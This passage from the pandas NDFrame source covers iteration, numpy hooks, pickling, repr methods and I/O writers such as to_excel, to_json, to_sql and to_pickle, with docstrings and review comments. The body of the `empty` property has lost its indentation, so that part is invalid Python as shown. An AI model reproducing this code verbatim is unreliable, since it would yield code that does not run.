            dropped.drop(labels_to_drop, axis=0, inplace=True)
    return dropped
# ----------------------------------------------------------------------
# Iteration
def __hash__(self):
    """
    Always raise TypeError: NDFrame subclasses are mutable and therefore
    cannot be hashed.
    """
    # Single message literal: the previous second fragment carried an
    # f-prefix with no placeholders (useless f-string, lint F541).
    # Message bytes are unchanged.
    raise TypeError(
        f"{repr(type(self).__name__)} objects are mutable, "
        "thus they cannot be hashed"
    )
def __iter__(self):
    """
    Iterate over the info axis.

    Returns
    -------
    iterator
        Labels of the info axis (index for Series, columns for DataFrame).
    """
    for label in self._info_axis:
        yield label
# The "info axis" is the axis used for key-based lookup: the index for
# Series and the columns for DataFrame.
def keys(self):
    """
    Return the info axis.

    This is the index for Series and the columns for DataFrame.

    Returns
    -------
    Index
        Info axis.
    """
    return self._info_axis
def items(self):
    """
    Lazily yield ``(label, values)`` pairs over the info axis.

    This is the index for Series and the columns for DataFrame.

    Returns
    -------
    Generator
    """
    for label in self._info_axis:
        yield label, self[label]
@Appender(items.__doc__)
def iteritems(self):
    # Alias of items(); the docstring is copied from items() via @Appender.
    return self.items()
def __len__(self) -> int:
    """Return the length of the info axis (index for Series, columns for DataFrame)."""
    return len(self._info_axis)
def __contains__(self, key) -> bool_t:
    """True if ``key`` is in the info axis (index for Series, columns for DataFrame)."""
    return key in self._info_axis
@property
def empty(self) -> bool_t:
"""
Indicator whether DataFrame is empty.
True if DataFrame is entirely empty (no items), meaning any of the
axes are of length 0.
Returns
-------
bool
If DataFrame is empty, return True, if not return False.
See Also
--------
Series.dropna : Return series without null values.
DataFrame.dropna : Return DataFrame with labels on given axis omitted
where (all or any) data are missing.
Notes
-----
If DataFrame contains only NaNs, it is still not considered empty. See
the example below.
Examples
--------
An example of an actual empty DataFrame. Notice the index is empty:
>>> df_empty = pd.DataFrame({'A' : []})
>>> df_empty
Empty DataFrame
Columns: [A]
Index: []
>>> df_empty.empty
True
If we only have NaNs in our DataFrame, it is not considered empty! We
will need to drop the NaNs to make the DataFrame empty:
>>> df = pd.DataFrame({'A' : [np.nan]})
>>> df
A
0 NaN
>>> df.empty
False
>>> df.dropna().empty
True
"""
return any(len(self._get_axis(a)) == 0 for a in self._AXIS_ORDERS)
# ----------------------------------------------------------------------
# Array Interface
# This is also set in IndexOpsMixin
# GH#23114 Ensure ndarray.__op__(DataFrame) returns NotImplemented
# A priority above ndarray's default (0.0) makes numpy hand binary ops
# back to pandas instead of broadcasting element-wise itself.
__array_priority__ = 1000
def __array__(self, dtype=None) -> np.ndarray:
    # numpy conversion hook.  NOTE(review): `dtype` is accepted for
    # protocol compatibility but is not forwarded to the extraction
    # helper here — confirm whether that is intentional.
    return com.values_from_object(self)
def __array_wrap__(self, result, context=None):
    """Wrap the result of a numpy ufunc back into this object's type."""
    result = lib.item_from_zerodim(result)
    if is_scalar(result):
        # e.g. we get here with np.ptp(series)
        # ptp also requires the item_from_zerodim
        return result
    # Reattach this object's axes (without copying them) to the new values.
    d = self._construct_axes_dict(self._AXIS_ORDERS, copy=False)
    return self._constructor(result, **d).__finalize__(self)
# ideally we would define this to avoid the getattr checks, but
# is slower
# @property
# def __array_interface__(self):
# """ provide numpy array interface method """
# values = self.values
# return dict(typestr=values.dtype.str,shape=values.shape,data=values)
# ----------------------------------------------------------------------
# Picklability
def __getstate__(self) -> Dict[str, Any]:
    """Build the pickle state dict: block manager, type tag, attrs, and metadata."""
    state = {
        "_data": self._data,
        "_typ": self._typ,
        "_metadata": self._metadata,
        "attrs": self.attrs,
    }
    # Metadata attributes are added last (missing ones become None).
    for key in self._metadata:
        state[key] = getattr(self, key, None)
    return state
def __setstate__(self, state):
    # Restore pickled state.  `state` is either a raw BlockManager or a
    # dict produced by __getstate__; very old (pre-0.12) formats raise.
    if isinstance(state, BlockManager):
        self._data = state
    elif isinstance(state, dict):
        typ = state.get("_typ")
        if typ is not None:
            attrs = state.get("_attrs", {})
            object.__setattr__(self, "_attrs", attrs)
            # set in the order of internal names
            # to avoid definitional recursion
            # e.g. say fill_value needing _data to be
            # defined
            meta = set(self._internal_names + self._metadata)
            for k in list(meta):
                if k in state:
                    v = state[k]
                    object.__setattr__(self, k, v)
            # Any remaining keys are set verbatim after the known ones.
            for k, v in state.items():
                if k not in meta:
                    object.__setattr__(self, k, v)
        else:
            raise NotImplementedError("Pre-0.12 pickles are no longer supported")
    elif len(state) == 2:
        raise NotImplementedError("Pre-0.12 pickles are no longer supported")
    # Invalidate any cached item references carried over from the old object.
    self._item_cache = {}
# ----------------------------------------------------------------------
# Rendering Methods
def __repr__(self) -> str:
    # string representation based upon iterating over self
    # (since, by definition, `PandasContainers` are iterable)
    # Join with ',' using single quotes: the previous form nested double
    # quotes inside a double-quoted f-string, which is a SyntaxError on
    # every Python version before 3.12 (PEP 701).
    prepr = f"[{','.join(map(pprint_thing, self))}]"
    return f"{type(self).__name__}({prepr})"
def _repr_latex_(self):
    """
    Return a LaTeX representation for this object, or None when the
    ``display.latex.repr`` option is off.

    Mainly for use with nbconvert (jupyter notebook conversion to pdf).
    """
    if not config.get_option("display.latex.repr"):
        return None
    return self.to_latex()
def _repr_data_resource_(self):
    """
    Return a Table Schema payload for display machinery, or None when the
    ``display.html.table_schema`` option is off.

    Not a real Jupyter special repr method, but we use the same naming
    convention.
    """
    if not config.get_option("display.html.table_schema"):
        return None
    # Only serialize up to display.max_rows rows.
    head = self.head(config.get_option("display.max_rows"))
    as_json = head.to_json(orient="table")
    return json.loads(as_json, object_pairs_hook=collections.OrderedDict)
# ----------------------------------------------------------------------
# I/O Methods
_shared_docs[
"to_markdown"
] = """
Print %(klass)s in Markdown-friendly format.
.. versionadded:: 1.0.0
Parameters
----------
buf : str, Path or StringIO-like, optional, default None
Buffer to write to. If None, the output is returned as a string.
mode : str, optional
Mode in which file is opened.
**kwargs
These parameters will be passed to `tabulate`.
Returns
-------
str
%(klass)s in Markdown-friendly format.
"""
_shared_docs[
"to_excel"
] = """
Write %(klass)s to an Excel sheet.
To write a single %(klass)s to an Excel .xlsx file it is only necessary to
specify a target file name. To write to multiple sheets it is necessary to
create an `ExcelWriter` object with a target file name, and specify a sheet
in the file to write to.
Multiple sheets may be written to by specifying unique `sheet_name`.
With all data written to the file it is necessary to save the changes.
Note that creating an `ExcelWriter` object with a file name that already
exists will result in the contents of the existing file being erased.
Parameters
----------
excel_writer : str or ExcelWriter object
File path or existing ExcelWriter.
sheet_name : str, default 'Sheet1'
Name of sheet which will contain DataFrame.
na_rep : str, default ''
Missing data representation.
float_format : str, optional
Format string for floating point numbers. For example
``float_format="%%.2f"`` will format 0.1234 to 0.12.
columns : sequence or list of str, optional
Columns to write.
header : bool or list of str, default True
Write out the column names. If a list of string is given it is
assumed to be aliases for the column names.
index : bool, default True
Write row names (index).
index_label : str or sequence, optional
Column label for index column(s) if desired. If not specified, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the DataFrame uses MultiIndex.
startrow : int, default 0
Upper left cell row to dump data frame.
startcol : int, default 0
Upper left cell column to dump data frame.
engine : str, optional
Write engine to use, 'openpyxl' or 'xlsxwriter'. You can also set this
via the options ``io.excel.xlsx.writer``, ``io.excel.xls.writer``, and
``io.excel.xlsm.writer``.
merge_cells : bool, default True
Write MultiIndex and Hierarchical Rows as merged cells.
encoding : str, optional
Encoding of the resulting excel file. Only necessary for xlwt,
other writers support unicode natively.
inf_rep : str, default 'inf'
Representation for infinity (there is no native representation for
infinity in Excel).
verbose : bool, default True
Display more information in the error logs.
freeze_panes : tuple of int (length 2), optional
Specifies the one-based bottommost row and rightmost column that
is to be frozen.
See Also
--------
to_csv : Write DataFrame to a comma-separated values (csv) file.
ExcelWriter : Class for writing DataFrame objects into excel sheets.
read_excel : Read an Excel file into a pandas DataFrame.
read_csv : Read a comma-separated values (csv) file into DataFrame.
Notes
-----
For compatibility with :meth:`~DataFrame.to_csv`,
to_excel serializes lists and dicts to strings before writing.
Once a workbook has been saved it is not possible write further data
without rewriting the whole workbook.
Examples
--------
Create, write to and save a workbook:
>>> df1 = pd.DataFrame([['a', 'b'], ['c', 'd']],
... index=['row 1', 'row 2'],
... columns=['col 1', 'col 2'])
>>> df1.to_excel("output.xlsx") # doctest: +SKIP
To specify the sheet name:
>>> df1.to_excel("output.xlsx",
... sheet_name='Sheet_name_1') # doctest: +SKIP
If you wish to write to more than one sheet in the workbook, it is
necessary to specify an ExcelWriter object:
>>> df2 = df1.copy()
>>> with pd.ExcelWriter('output.xlsx') as writer: # doctest: +SKIP
... df1.to_excel(writer, sheet_name='Sheet_name_1')
... df2.to_excel(writer, sheet_name='Sheet_name_2')
ExcelWriter can also be used to append to an existing Excel file:
>>> with pd.ExcelWriter('output.xlsx',
... mode='a') as writer: # doctest: +SKIP
... df.to_excel(writer, sheet_name='Sheet_name_3')
To set the library that is used to write the Excel file,
you can pass the `engine` keyword (the default engine is
automatically chosen depending on the file extension):
>>> df1.to_excel('output1.xlsx', engine='xlsxwriter') # doctest: +SKIP
"""
@Appender(_shared_docs["to_excel"] % dict(klass="object"))
def to_excel(
    self,
    excel_writer,
    sheet_name="Sheet1",
    na_rep="",
    float_format=None,
    columns=None,
    header=True,
    index=True,
    index_label=None,
    startrow=0,
    startcol=0,
    engine=None,
    merge_cells=True,
    encoding=None,
    inf_rep="inf",
    verbose=True,
    freeze_panes=None,
) -> None:
    # Promote a Series to a one-column DataFrame so a single writer path
    # handles both callers.
    df = self if isinstance(self, ABCDataFrame) else self.to_frame()
    from pandas.io.formats.excel import ExcelFormatter
    # Cell-formatting options are bound at construction time...
    # NOTE(review): `encoding` and `verbose` are accepted but not
    # forwarded anywhere in this body — confirm whether they are consumed
    # downstream or simply retained for API compatibility.
    formatter = ExcelFormatter(
        df,
        na_rep=na_rep,
        cols=columns,
        header=header,
        float_format=float_format,
        index=index,
        index_label=index_label,
        merge_cells=merge_cells,
        inf_rep=inf_rep,
    )
    # ...while writer/placement options are supplied to write().
    formatter.write(
        excel_writer,
        sheet_name=sheet_name,
        startrow=startrow,
        startcol=startcol,
        freeze_panes=freeze_panes,
        engine=engine,
    )
def to_json(
    self,
    path_or_buf: Optional[FilePathOrBuffer] = None,
    orient: Optional[str] = None,
    date_format: Optional[str] = None,
    double_precision: int = 10,
    force_ascii: bool_t = True,
    date_unit: str = "ms",
    default_handler: Optional[Callable[[Any], JSONSerializable]] = None,
    lines: bool_t = False,
    compression: Optional[str] = "infer",
    index: bool_t = True,
    indent: Optional[int] = None,
) -> Optional[str]:
    """
    Convert the object to a JSON string.
    Note NaN's and None will be converted to null and datetime objects
    will be converted to UNIX timestamps.
    Parameters
    ----------
    path_or_buf : str or file handle, optional
        File path or object. If not specified, the result is returned as
        a string.
    orient : str
        Indication of expected JSON string format.
        * Series:
            - default is 'index'
            - allowed values are: {'split','records','index','table'}.
        * DataFrame:
            - default is 'columns'
            - allowed values are: {'split', 'records', 'index', 'columns',
              'values', 'table'}.
        * The format of the JSON string:
            - 'split' : dict like {'index' -> [index], 'columns' -> [columns],
              'data' -> [values]}
            - 'records' : list like [{column -> value}, ... , {column -> value}]
            - 'index' : dict like {index -> {column -> value}}
            - 'columns' : dict like {column -> {index -> value}}
            - 'values' : just the values array
            - 'table' : dict like {'schema': {schema}, 'data': {data}}
            Describing the data, where data component is like ``orient='records'``.
        .. versionchanged:: 0.20.0
    date_format : {None, 'epoch', 'iso'}
        Type of date conversion. 'epoch' = epoch milliseconds,
        'iso' = ISO8601. The default depends on the `orient`. For
        ``orient='table'``, the default is 'iso'. For all other orients,
        the default is 'epoch'.
    double_precision : int, default 10
        The number of decimal places to use when encoding
        floating point values.
    force_ascii : bool, default True
        Force encoded string to be ASCII.
    date_unit : str, default 'ms' (milliseconds)
        The time unit to encode to, governs timestamp and ISO8601
        precision. One of 's', 'ms', 'us', 'ns' for second, millisecond,
        microsecond, and nanosecond respectively.
    default_handler : callable, default None
        Handler to call if object cannot otherwise be converted to a
        suitable format for JSON. Should receive a single argument which is
        the object to convert and return a serialisable object.
    lines : bool, default False
        If 'orient' is 'records' write out line delimited json format. Will
        throw ValueError if incorrect 'orient' since others are not list
        like.
    compression : {'infer', 'gzip', 'bz2', 'zip', 'xz', None}
        A string representing the compression to use in the output file,
        only used when the first argument is a filename. By default, the
        compression is inferred from the filename.
        .. versionadded:: 0.21.0
        .. versionchanged:: 0.24.0
           'infer' option added and set to default
    index : bool, default True
        Whether to include the index values in the JSON string. Not
        including the index (``index=False``) is only supported when
        orient is 'split' or 'table'.
        .. versionadded:: 0.23.0
    indent : int, optional
       Length of whitespace used to indent each record.
       .. versionadded:: 1.0.0
    Returns
    -------
    None or str
        If path_or_buf is None, returns the resulting json format as a
        string. Otherwise returns None.
    See Also
    --------
    read_json : Convert a JSON string to pandas object.
    Notes
    -----
    The behavior of ``indent=0`` varies from the stdlib, which does not
    indent the output but does insert newlines. Currently, ``indent=0``
    and the default ``indent=None`` are equivalent in pandas, though this
    may change in a future release.
    Examples
    --------
    >>> df = pd.DataFrame([['a', 'b'], ['c', 'd']],
    ...                   index=['row 1', 'row 2'],
    ...                   columns=['col 1', 'col 2'])
    >>> df.to_json(orient='split')
    '{"columns":["col 1","col 2"],
      "index":["row 1","row 2"],
      "data":[["a","b"],["c","d"]]}'
    Encoding/decoding a Dataframe using ``'records'`` formatted JSON.
    Note that index labels are not preserved with this encoding.
    >>> df.to_json(orient='records')
    '[{"col 1":"a","col 2":"b"},{"col 1":"c","col 2":"d"}]'
    Encoding/decoding a Dataframe using ``'index'`` formatted JSON:
    >>> df.to_json(orient='index')
    '{"row 1":{"col 1":"a","col 2":"b"},"row 2":{"col 1":"c","col 2":"d"}}'
    Encoding/decoding a Dataframe using ``'columns'`` formatted JSON:
    >>> df.to_json(orient='columns')
    '{"col 1":{"row 1":"a","row 2":"c"},"col 2":{"row 1":"b","row 2":"d"}}'
    Encoding/decoding a Dataframe using ``'values'`` formatted JSON:
    >>> df.to_json(orient='values')
    '[["a","b"],["c","d"]]'
    Encoding with Table Schema
    >>> df.to_json(orient='table')
    '{"schema": {"fields": [{"name": "index", "type": "string"},
                            {"name": "col 1", "type": "string"},
                            {"name": "col 2", "type": "string"}],
                 "primaryKey": "index",
                 "pandas_version": "0.20.0"},
      "data": [{"index": "row 1", "col 1": "a", "col 2": "b"},
               {"index": "row 2", "col 1": "c", "col 2": "d"}]}'
    """
    from pandas.io import json
    # Table Schema output defaults to ISO-8601 dates; every other orient
    # keeps the historical epoch-milliseconds default.
    if date_format is None and orient == "table":
        date_format = "iso"
    elif date_format is None:
        date_format = "epoch"
    # Validate, then normalize: None means no indentation (0).
    config.is_nonnegative_int(indent)
    indent = indent or 0
    return json.to_json(
        path_or_buf=path_or_buf,
        obj=self,
        orient=orient,
        date_format=date_format,
        double_precision=double_precision,
        force_ascii=force_ascii,
        date_unit=date_unit,
        default_handler=default_handler,
        lines=lines,
        compression=compression,
        index=index,
        indent=indent,
    )
def to_hdf(
    self,
    path_or_buf,
    key: str,
    mode: str = "a",
    complevel: Optional[int] = None,
    complib: Optional[str] = None,
    append: bool_t = False,
    format: Optional[str] = None,
    index: bool_t = True,
    min_itemsize: Optional[Union[int, Dict[str, int]]] = None,
    nan_rep=None,
    dropna: Optional[bool_t] = None,
    data_columns: Optional[List[str]] = None,
    errors: str = "strict",
    encoding: str = "UTF-8",
) -> None:
    """
    Write the contained data to an HDF5 file using HDFStore.
    Hierarchical Data Format (HDF) is self-describing, allowing an
    application to interpret the structure and contents of a file with
    no outside information. One HDF file can hold a mix of related objects
    which can be accessed as a group or as individual objects.
    In order to add another DataFrame or Series to an existing HDF file
    please use append mode and a different a key.
    For more information see the :ref:`user guide <io.hdf5>`.
    Parameters
    ----------
    path_or_buf : str or pandas.HDFStore
        File path or HDFStore object.
    key : str
        Identifier for the group in the store.
    mode : {'a', 'w', 'r+'}, default 'a'
        Mode to open file:
        - 'w': write, a new file is created (an existing file with
          the same name would be deleted).
        - 'a': append, an existing file is opened for reading and
          writing, and if the file does not exist it is created.
        - 'r+': similar to 'a', but the file must already exist.
    complevel : {0-9}, optional
        Specifies a compression level for data.
        A value of 0 disables compression.
    complib : {'zlib', 'lzo', 'bzip2', 'blosc'}, default 'zlib'
        Specifies the compression library to be used.
        As of v0.20.2 these additional compressors for Blosc are supported
        (default if no compressor specified: 'blosc:blosclz'):
        {'blosc:blosclz', 'blosc:lz4', 'blosc:lz4hc', 'blosc:snappy',
        'blosc:zlib', 'blosc:zstd'}.
        Specifying a compression library which is not available issues
        a ValueError.
    append : bool, default False
        For Table formats, append the input data to the existing.
    format : {'fixed', 'table', None}, default 'fixed'
        Possible values:
        - 'fixed': Fixed format. Fast writing/reading. Not-appendable,
          nor searchable.
        - 'table': Table format. Write as a PyTables Table structure
          which may perform worse but allow more flexible operations
          like searching / selecting subsets of the data.
        - If None, pd.get_option('io.hdf.default_format') is checked,
          followed by fallback to "fixed"
    errors : str, default 'strict'
        Specifies how encoding and decoding errors are to be handled.
        See the errors argument for :func:`open` for a full list
        of options.
    encoding : str, default "UTF-8"
    min_itemsize : dict or int, optional
        Map column names to minimum string sizes for columns.
    nan_rep : Any, optional
        How to represent null values as str.
        Not allowed with append=True.
    data_columns : list of columns or True, optional
        List of columns to create as indexed data columns for on-disk
        queries, or True to use all columns. By default only the axes
        of the object are indexed. See :ref:`io.hdf5-query-data-columns`.
        Applicable only to format='table'.
    See Also
    --------
    DataFrame.read_hdf : Read from HDF file.
    DataFrame.to_parquet : Write a DataFrame to the binary parquet format.
    DataFrame.to_sql : Write to a sql table.
    DataFrame.to_feather : Write out feather-format for DataFrames.
    DataFrame.to_csv : Write out to a csv file.
    Examples
    --------
    >>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [4, 5, 6]},
    ...                   index=['a', 'b', 'c'])
    >>> df.to_hdf('data.h5', key='df', mode='w')
    We can add another object to the same file:
    >>> s = pd.Series([1, 2, 3, 4])
    >>> s.to_hdf('data.h5', key='s')
    Reading from HDF file:
    >>> pd.read_hdf('data.h5', 'df')
    A B
    a  1  4
    b  2  5
    c  3  6
    >>> pd.read_hdf('data.h5', 's')
    0    1
    1    2
    2    3
    3    4
    dtype: int64
    Deleting file with data:
    >>> import os
    >>> os.remove('data.h5')
    """
    from pandas.io import pytables
    # Thin wrapper: every option is forwarded verbatim to the pytables
    # backend, which performs validation and the actual write.
    pytables.to_hdf(
        path_or_buf,
        key,
        self,
        mode=mode,
        complevel=complevel,
        complib=complib,
        append=append,
        format=format,
        index=index,
        min_itemsize=min_itemsize,
        nan_rep=nan_rep,
        dropna=dropna,
        data_columns=data_columns,
        errors=errors,
        encoding=encoding,
    )
def to_sql(
    self,
    name: str,
    con,
    schema=None,
    if_exists: str = "fail",
    index: bool_t = True,
    index_label=None,
    chunksize=None,
    dtype=None,
    method=None,
) -> None:
    """
    Write records stored in a DataFrame to a SQL database.

    Databases supported by SQLAlchemy [1]_ are supported. Tables can be
    newly created, appended to, or overwritten.

    Parameters
    ----------
    name : str
        Name of SQL table.
    con : sqlalchemy.engine.Engine or sqlite3.Connection
        Using SQLAlchemy makes it possible to use any DB supported by that
        library. Legacy support is provided for sqlite3.Connection objects.
        The user is responsible for engine disposal and connection closure
        for the SQLAlchemy connectable. See `here \
<https://docs.sqlalchemy.org/en/13/core/connections.html>`_.
    schema : str, optional
        Specify the schema (if database flavor supports this). If None, use
        default schema.
    if_exists : {'fail', 'replace', 'append'}, default 'fail'
        How to behave if the table already exists.

        * fail: Raise a ValueError.
        * replace: Drop the table before inserting new values.
        * append: Insert new values to the existing table.
    index : bool, default True
        Write DataFrame index as a column. Uses `index_label` as the column
        name in the table.
    index_label : str or sequence, default None
        Column label for index column(s). If None is given (default) and
        `index` is True, then the index names are used.
        A sequence should be given if the DataFrame uses MultiIndex.
    chunksize : int, optional
        Specify the number of rows in each batch to be written at a time.
        By default, all rows will be written at once.
    dtype : dict or scalar, optional
        Specifying the datatype for columns. If a dictionary is used, the
        keys should be the column names and the values should be the
        SQLAlchemy types or strings for the sqlite3 legacy mode. If a
        scalar is provided, it will be applied to all columns.
    method : {None, 'multi', callable}, optional
        Controls the SQL insertion clause used:

        * None : Uses standard SQL ``INSERT`` clause (one per row).
        * 'multi': Pass multiple values in a single ``INSERT`` clause.
        * callable with signature ``(pd_table, conn, keys, data_iter)``.

        Details and a sample callable implementation can be found in the
        section :ref:`insert method <io.sql.method>`.

        .. versionadded:: 0.24.0

    Raises
    ------
    ValueError
        When the table already exists and `if_exists` is 'fail' (the
        default).

    See Also
    --------
    read_sql : Read a DataFrame from a table.

    Notes
    -----
    Timezone aware datetime columns will be written as
    ``Timestamp with timezone`` type with SQLAlchemy if supported by the
    database. Otherwise, the datetimes will be stored as timezone unaware
    timestamps local to the original timezone.

    .. versionadded:: 0.24.0

    References
    ----------
    .. [1] https://docs.sqlalchemy.org
    .. [2] https://www.python.org/dev/peps/pep-0249/

    Examples
    --------
    Create an in-memory SQLite database.

    >>> from sqlalchemy import create_engine
    >>> engine = create_engine('sqlite://', echo=False)

    Create a table from scratch with 3 rows.

    >>> df = pd.DataFrame({'name' : ['User 1', 'User 2', 'User 3']})
    >>> df
         name
    0  User 1
    1  User 2
    2  User 3

    >>> df.to_sql('users', con=engine)
    >>> engine.execute("SELECT * FROM users").fetchall()
    [(0, 'User 1'), (1, 'User 2'), (2, 'User 3')]

    >>> df1 = pd.DataFrame({'name' : ['User 4', 'User 5']})
    >>> df1.to_sql('users', con=engine, if_exists='append')
    >>> engine.execute("SELECT * FROM users").fetchall()
    [(0, 'User 1'), (1, 'User 2'), (2, 'User 3'),
     (0, 'User 4'), (1, 'User 5')]

    Overwrite the table with just ``df1``.

    >>> df1.to_sql('users', con=engine, if_exists='replace',
    ...            index_label='id')
    >>> engine.execute("SELECT * FROM users").fetchall()
    [(0, 'User 4'), (1, 'User 5')]

    Specify the dtype (especially useful for integers with missing values).
    Notice that while pandas is forced to store the data as floating point,
    the database supports nullable integers. When fetching the data with
    Python, we get back integer scalars.

    >>> df = pd.DataFrame({"A": [1, None, 2]})
    >>> df
         A
    0  1.0
    1  NaN
    2  2.0

    >>> from sqlalchemy.types import Integer
    >>> df.to_sql('integers', con=engine, index=False,
    ...           dtype={"A": Integer()})

    >>> engine.execute("SELECT * FROM integers").fetchall()
    [(1,), (None,), (2,)]
    """
    from pandas.io import sql

    # This method is only a façade so Series and DataFrame share one entry
    # point; all real work happens in the pandas SQL io layer. Gather the
    # pass-through keywords once so the hand-off reads as a single call.
    sql_options = dict(
        schema=schema,
        if_exists=if_exists,
        index=index,
        index_label=index_label,
        chunksize=chunksize,
        dtype=dtype,
        method=method,
    )
    sql.to_sql(self, name, con, **sql_options)
def to_pickle(
    self,
    path,
    compression: Optional[str] = "infer",
    protocol: int = pickle.HIGHEST_PROTOCOL,
) -> None:
    """
    Pickle (serialize) object to file.

    Parameters
    ----------
    path : str
        File path where the pickled object will be stored.
    compression : {'infer', 'gzip', 'bz2', 'zip', 'xz', None}, \
default 'infer'
        A string representing the compression to use in the output file. By
        default, infers from the file extension in specified path.
    protocol : int
        Int which indicates which protocol should be used by the pickler,
        default HIGHEST_PROTOCOL (see [1]_ paragraph 12.1.2). The possible
        values are 0, 1, 2, 3, 4. A negative value for the protocol
        parameter is equivalent to setting its value to HIGHEST_PROTOCOL.

        .. [1] https://docs.python.org/3/library/pickle.html.

        .. versionadded:: 0.21.0.

    See Also
    --------
    read_pickle : Load pickled pandas object (or any object) from file.
    DataFrame.to_hdf : Write DataFrame to an HDF5 file.
    DataFrame.to_sql : Write DataFrame to a SQL database.
    DataFrame.to_parquet : Write a DataFrame to the binary parquet format.

    Examples
    --------
    >>> original_df = pd.DataFrame({"foo": range(5), "bar": range(5, 10)})
    >>> original_df
       foo  bar
    0    0    5
    1    1    6
    2    2    7
    3    3    8
    4    4    9
    >>> original_df.to_pickle("./dummy.pkl")

    >>> unpickled_df = pd.read_pickle("./dummy.pkl")
    >>> unpickled_df
       foo  bar
    0    0    5
    1    1    6
    2    2    7
    3    3    8
    4    4    9

    >>> import os
    >>> os.remove("./dummy.pkl")
    """
    # Alias the io-layer function so it does not shadow this method's name
    # inside the body; all serialization work is delegated to it.
    from pandas.io.pickle import to_pickle as _pickle_writer

    _pickle_writer(self, path, compression=compression, protocol=protocol)
def to_clipboard(
    self, excel: bool_t = True, sep: Optional[str] = None, **kwargs
) -> None:
    r"""
    Copy object to the system clipboard.

    Write a text representation of object to the system clipboard.
    This can be pasted into Excel, for example.

    Parameters
    ----------
    excel : bool, default True
        Produce output in a csv format for easy pasting into excel.

        - True, use the provided separator for csv pasting.
        - False, write a string representation of the object to the clipboard.

    sep : str, default ``'\t'``
        Field delimiter.
    **kwargs
        These parameters will be passed to DataFrame.to_csv.

    See Also
    --------
    DataFrame.to_csv : Write a DataFrame to a comma-separated values
        (csv) file.
    read_clipboard : Read text from clipboard and pass to read_table.

    Notes
    -----
    Requirements for your platform.

    - Linux : `xclip`, or `xsel` (with `PyQt4` modules)
    - Windows : none
    - OS X : none

    Examples
    --------
    Copy the contents of a DataFrame to the clipboard.

    >>> df = pd.DataFrame([[1, 2, 3], [4, 5, 6]], columns=['A', 'B', 'C'])
    >>> df.to_clipboard(sep=',')
    ... # Wrote the following to the system clipboard:
    ... # ,A,B,C
    ... # 0,1,2,3
    ... # 1,4,5,6

    We can omit the index by passing the keyword `index` and setting
    it to false.

    >>> df.to_clipboard(sep=',', index=False)
    ... # Wrote the following to the system clipboard:
    ... # A,B,C
    ... # 1,2,3
    ... # 4,5,6
    """
    # Pure delegation: the platform-specific clipboard handling (xclip /
    # win32 / pbcopy) lives entirely in the clipboard io layer.
    from pandas.io import clipboards

    clipboards.to_clipboard(self, excel=excel, sep=sep, **kwargs)
def to_xarray(self):
    """
    Return an xarray object from the pandas object.

    Returns
    -------
    xarray.DataArray or xarray.Dataset
        Data in the pandas structure converted to Dataset if the object is
        a DataFrame, or a DataArray if the object is a Series.

    See Also
    --------
    DataFrame.to_hdf : Write DataFrame to an HDF5 file.
    DataFrame.to_parquet : Write a DataFrame to the binary parquet format.

    Notes
    -----
    See the `xarray docs <https://xarray.pydata.org/en/stable/>`__

    Examples
    --------
    >>> df = pd.DataFrame([('falcon', 'bird', 389.0, 2),
    ...                    ('parrot', 'bird', 24.0, 2),
    ...                    ('lion', 'mammal', 80.5, 4),
    ...                    ('monkey', 'mammal', np.nan, 4)],
    ...                   columns=['name', 'class', 'max_speed',
    ...                            'num_legs'])
    >>> df
         name   class  max_speed  num_legs
    0  falcon    bird      389.0         2
    1  parrot    bird       24.0         2
    2    lion  mammal       80.5         4
    3  monkey  mammal        NaN         4

    >>> df.to_xarray()
    <xarray.Dataset>
    Dimensions:    (index: 4)
    Coordinates:
      * index      (index) int64 0 1 2 3
    Data variables:
        name       (index) object 'falcon' 'parrot' 'lion' 'monkey'
        class      (index) object 'bird' 'bird' 'mammal' 'mammal'
        max_speed  (index) float64 389.0 24.0 80.5 nan
        num_legs   (index) int64 2 2 4 4

    >>> df['max_speed'].to_xarray()
    <xarray.DataArray 'max_speed' (index: 4)>
    array([389. ,  24. ,  80.5,   nan])
    Coordinates:
      * index    (index) int64 0 1 2 3

    >>> dates = pd.to_datetime(['2018-01-01', '2018-01-01',
    ...                         '2018-01-02', '2018-01-02'])
    >>> df_multiindex = pd.DataFrame({'date': dates,
    ...                               'animal': ['falcon', 'parrot',
    ...                                          'falcon', 'parrot'],
    ...                               'speed': [350, 18, 361, 15]})
    >>> df_multiindex = df_multiindex.set_index(['date', 'animal'])
    >>> df_multiindex
                       speed
    date       animal
    2018-01-01 falcon    350
               parrot     18
    2018-01-02 falcon    361
               parrot     15

    >>> df_multiindex.to_xarray()
    <xarray.Dataset>
    Dimensions:  (animal: 2, date: 2)
    Coordinates:
      * date     (date) datetime64[ns] 2018-01-01 2018-01-02
      * animal   (animal) object 'falcon' 'parrot'
    Data variables:
        speed    (date, animal) int64 350 18 361 15
    """
    # xarray is an optional dependency; this raises a helpful ImportError
    # when it is missing.
    xarray = import_optional_dependency("xarray")

    # 2-D objects (DataFrame) become a Dataset; 1-D (Series) a DataArray.
    if self.ndim != 1:
        return xarray.Dataset.from_dataframe(self)
    return xarray.DataArray.from_series(self)
@Substitution(returns=fmt.return_docstring)
def to_latex(
    self,
    buf=None,
    columns=None,
    col_space=None,
    header=True,
    index=True,
    na_rep="NaN",
    formatters=None,
    float_format=None,
    sparsify=None,
    index_names=True,
    bold_rows=False,
    column_format=None,
    longtable=None,
    escape=None,
    encoding=None,
    decimal=".",
    multicolumn=None,
    multicolumn_format=None,
    multirow=None,
    caption=None,
    label=None,
):
    r"""
    Render object to a LaTeX tabular, longtable, or nested table/tabular.

    Requires ``\usepackage{booktabs}``. The output can be copy/pasted
    into a main LaTeX document or read from an external file
    with ``\input{table.tex}``.

    .. versionchanged:: 0.20.2
       Added to Series.

    .. versionchanged:: 1.0.0
       Added caption and label arguments.

    Parameters
    ----------
    buf : str, Path or StringIO-like, optional, default None
        Buffer to write to. If None, the output is returned as a string.
    columns : list of label, optional
        The subset of columns to write. Writes all columns by default.
    col_space : int, optional
        The minimum width of each column.
    header : bool or list of str, default True
        Write out the column names. If a list of strings is given,
        it is assumed to be aliases for the column names.
    index : bool, default True
        Write row names (index).
    na_rep : str, default 'NaN'
        Missing data representation.
    formatters : list of functions or dict of {str: function}, optional
        Formatter functions to apply to columns' elements by position or
        name. The result of each function must be a unicode string.
        List must be of length equal to the number of columns.
    float_format : one-parameter function or str, optional, default None
        Formatter for floating point numbers. For example
        ``float_format="%%.2f"`` and ``float_format="{:0.2f}".format`` will
        both result in 0.1234 being formatted as 0.12.
    sparsify : bool, optional
        Set to False for a DataFrame with a hierarchical index to print
